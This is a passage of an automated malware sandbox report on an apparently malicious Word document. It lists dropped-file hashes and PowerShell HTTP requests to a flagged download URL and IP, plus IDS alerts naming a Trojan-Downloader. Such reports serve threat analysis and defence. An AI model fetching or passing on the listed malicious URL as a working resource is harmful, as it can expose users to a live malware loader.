2624WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DCAA67B0E70660D81D617FA974400603
SHA256:9FABD5C9F34C29E3100E05A15E1B4542A4BAF8849FC0CED4847B6465D692BCF4
3188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20fbf8.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$019-01.xmlpgc
MD5:762CDCC2F2C06FD90AB917B29397A1A6
SHA256:C624E166490F876250B58A017508582C146852A436C17EE36999258048831FA5
2624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:2229E97A0FC24435EA0B9B2679208C4A
SHA256:3A67027CAE69D622F7F55A5E07AF7305831D624F7354F91A51BE0A3B80C577F7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3188
powershell.exe
GET
164.138.208.39:80
http://jumesamedina.com/FKcXltRa/
ES
malicious
3188
powershell.exe
GET
301
164.138.208.39:80
http://jumesamedina.com/FKcXltRa
ES
html
241 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3188
powershell.exe
164.138.208.39:80
jumesamedina.com
Cyberneticos Hosting SL
ES
malicious

DNS requests

Domain
IP
Reputation
jumesamedina.com
  • 164.138.208.39
malicious

Threats

PID
Process
Class
Message
3188
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3188
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
No debug info